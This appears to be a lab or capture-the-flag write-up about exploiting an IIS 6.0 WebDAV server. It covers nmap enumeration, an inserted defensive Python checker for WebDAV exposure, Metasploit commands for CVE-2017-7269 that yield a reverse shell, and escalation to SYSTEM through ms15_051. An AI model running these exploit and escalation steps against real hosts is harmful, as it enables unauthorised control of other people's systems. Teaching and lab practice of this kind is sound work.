Enumeration

As usual, we start off with an nmap scan to get a listing of open ports and running services:

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT POST MOVE MKCOL PROPPATCH
|_  Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-title: Under Construction
| http-webdav-scan:
|   WebDAV type: Unknown
|   Server Date: Sat, 14 Sep 2024 03:21:24 GMT
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|_  Server Type: Microsoft-IIS/6.0
|_http-server-header: Microsoft-IIS/6.0

We find only one open port, 80, serving a web application. Visiting the site shows the generic Under Construction page from IIS 6.0.

IIS 6.0 has a well-known vulnerability tracked as CVE-2017-7269, with many public proof-of-concept exploits available on GitHub and a reliable module in Metasploit.
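The scan output above is the same information a defender would gather to confirm exposure: an IIS 6.0 banner plus WebDAV verbs (PROPFIND, LOCK, MKCOL and friends) in the OPTIONS reply. The following script is an added example, not part of the original writeup; the function names are my own, and the sample response is constructed from the Allowed/Public method lists the scan reports.

```python
import http.client
import re

# WebDAV verbs (RFC 4918) whose presence in an OPTIONS reply shows WebDAV is enabled
WEBDAV_METHODS = {"PROPFIND", "PROPPATCH", "MKCOL", "COPY", "MOVE", "LOCK", "UNLOCK", "SEARCH"}
# Verbs that let a client modify site content; worth flagging on any internet-facing host
WRITE_METHODS = {"PUT", "DELETE", "COPY", "MOVE", "MKCOL", "PROPPATCH", "LOCK", "UNLOCK"}

def _method_list(header_value):
    # Real headers are comma separated, nmap prints them space separated; accept both
    return {m.strip().upper() for m in re.split(r"[,\s]+", header_value) if m.strip()}

def assess_options_headers(headers):
    """headers: dict of lower-cased header name -> value from an OPTIONS reply."""
    allowed = _method_list(headers.get("allow", "")) | _method_list(headers.get("public", ""))
    server = headers.get("server", "")
    return {
        "server": server,
        "iis6": server.startswith("Microsoft-IIS/6."),
        "webdav_enabled": bool(allowed & WEBDAV_METHODS),
        "webdav_methods": sorted(allowed & WEBDAV_METHODS),
        "write_methods": sorted(allowed & WRITE_METHODS),
    }

def parse_raw_response(raw):
    """Parse a raw HTTP response (bytes) into (status code, headers dict)."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers

def check_host(host, port=80, path="/", timeout=5):
    """Live check against one of your own hosts: send OPTIONS and assess the reply."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    conn.request("OPTIONS", path)
    resp = conn.getresponse()
    headers = {k.lower(): v for k, v in resp.getheaders()}
    conn.close()
    return assess_options_headers(headers)

# Constructed OPTIONS reply mirroring the method lists in the scan output above
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: Microsoft-IIS/6.0\r\n"
    b"Allow: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK\r\n"
    b"Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH\r\n"
    b"DAV: 1, 2\r\n"
    b"Content-Length: 0\r\n\r\n"
)
```

A result with iis6 and webdav_enabled both true is the exposure this writeup goes on to exploit; the fix is to disable WebDAV on the server or retire IIS 6.0.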

Exploitation of CVE-2017-7269

This is a simple thing to exploit with Metasploit. I tried other people's Python scripts for it and, as usual, the code is so dodgy and hard to run because of poorly maintained Python versions and packages. Using Metasploit:

use windows/iis/iis_webdav_scstoragepathfromurl
set RHOSTS $target
set LHOST tun0
run

We successfully get a shell using this module. Since we are already in Metasploit, we can use local_exploit_suggester in lieu of winPEAS for a quick analysis of potential privilege escalation vectors. If you get errors like:

stdapi_sys_config_getuid: Operation failed: Access is denied

then you will need to migrate to another process running with the same privileges on the host.

Background the session with CTRL+Z, then use local_exploit_suggester and run it.

One of the results returned is windows/local/ms15_051_client_copy_image; running it yields an NT AUTHORITY\SYSTEM shell.

This module abuses improper object handling in the win32k.sys kernel-mode driver, allowing code execution with elevated privileges.